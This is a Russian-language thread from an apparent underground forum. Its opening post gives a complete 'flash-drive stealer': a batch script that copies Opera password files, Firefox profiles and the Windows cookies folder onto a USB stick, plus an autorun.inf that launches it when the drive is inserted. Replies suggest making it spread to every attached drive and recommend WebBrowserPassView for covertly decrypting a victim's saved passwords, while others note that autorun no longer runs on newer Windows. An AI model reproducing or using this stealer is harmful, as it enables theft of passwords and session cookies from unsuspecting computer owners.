• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Флешка-стиллер

• Автор темы Удалённый пользователь 43989
  • Дата начала

Удалённый пользователь 43989

Guest
У

Удалённый пользователь 43989

Guest
Итак. В этом посте вы узнаете как создать флешку-стиллер которая будет красть пароли с компьютера.

В первую очередь создаём батник с таким кодом: (это сам вирус)

@echo off
@if not exist \logfiles md \logfiles >nul
c:
chdir %APPDATA%\Opera\Opera\profile\ >nul
copy wand.dat g:\logfiles\wand.dat >nul
c:
chdir %APPDATA%\Opera\Opera 10 Preview!\profile\ >nul
copy wand.dat g:\logfiles\ >nul
c:
chdir %ProgramFiles%\Opera AC 3.7\profile
copy wand.bat g:\logfiles\ >nul
c:
chdir %UserProfile%\Cookies\
"C:\Program Files\WinRAR\WinRAR.exe" u -r -y -ep1 Cookies.rar *.*
copy Cookies.rar g:\logfiles\ >nul
del Cookies.rar >nul
c:
chdir %APPDATA%\Mozilla\Firefox\ >nul
"C:\Program Files\WinRAR\WinRAR.exe" u -r -y -ep1 Profiles.rar *.*
copy Profiles.rar g:\logfiles\ >nul
del profiles.rar >nul

И сохраняем в папку.
Далее создаём файл автозагрузки файла:

[autorun]
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=flash.bat

И сохраняем в ту же папку.

Потом оба файла кидаете на флешку и создаёте папку "logfiles"

Теперь осталось засунуть эту флешку в компьютер и пароли сами сохраняться.
P.S. В некоторых случаях надо будет открыть флешку на компе и открыть батник.
P.P.S. Соре если такой пост уже есть на форуме. Создал его для своего следующего поста. https://vlmi.top/threads/dlja-shkolnikov.8578/

Последнее редактирование модератором:

M1sty

Местный
Реакции
79
0 руб.
На заполненную файлам флешку можно так сделать?

Nesterk

Местный
Реакции
144
500 руб.
прописать бы еще, чтобы он распространялся на все съемные носители, которые в последующем будут подсоединены к этому пк)

Rezak

Новичок
Реакции
0
0 руб.
Это несложно сделать! Просто используй copy по всем буквам (ну и что,что дофига строк!). Главное скопировать и вирус,и авторан)

CapralLex

Новичок
Реакции
0
0 руб.
Telegram
Сейчас в браузерах(Chrome и Yandex точно) используется система локального шифрования. Вроде как привязка идёт к конкреткому ПК. Поэтому получить пароли можно только на машине, на которой пароли и хранятся. С помощью того же webbrowserpassview

Kidnapper145

Участник
Реакции
25
0 руб.
Ну, к чему я, собственно, пришел. Толка от этого мало потому что в хроме пароли хранятся в sql массиве, к тому же они зашифрованы, да так зашифрованы что расшифровать их получится только на машине жертвы. По ФФ и опере ничего конкретного сказать не могу, но я так понял что тоже там не все так просто.
Если я не прав - поправляйте.

Marik888

Участник
Реакции
5
0 руб.
Спасибо все равно. Подскажет может кто нибудь как люди начинают такие пироги сами писать придумывать... А то не знаю с чего начать одна вода.. Сам кроме как си,фишинга и оф разводов нихрена не умею.. Хочется уже и вирусняк самому научится писать алстстилер. Не надо меня забирать можно просто поговорить сообщение.. Так с чего начать?)

-ДАВИД-

Участник
Реакции
19
0 руб.
Такие стиллеры себя изжили, есть утилита типа webbrowserpassview она расшифровывает скрытно на машине жерты и создает txt c пассами, так же можно транспортировать на флэшке и открывать батником.

Glypher

Новичок
Реакции
1
0 руб.
Для начала стоит заметить, что тема настолько древняя, что уже устарела. Файл авторана работает только на ХР и, возможно, семерке. Дальше это уже пофиксили

-ДАВИД-

Участник
Реакции
19
0 руб.
Для начала стоит заметить, что тема настолько древняя, что уже устарела. Файл авторана работает только на ХР и, возможно, семерке. Дальше это уже пофиксили
На 7-ке автораны не запускаются.

Сверху Снизу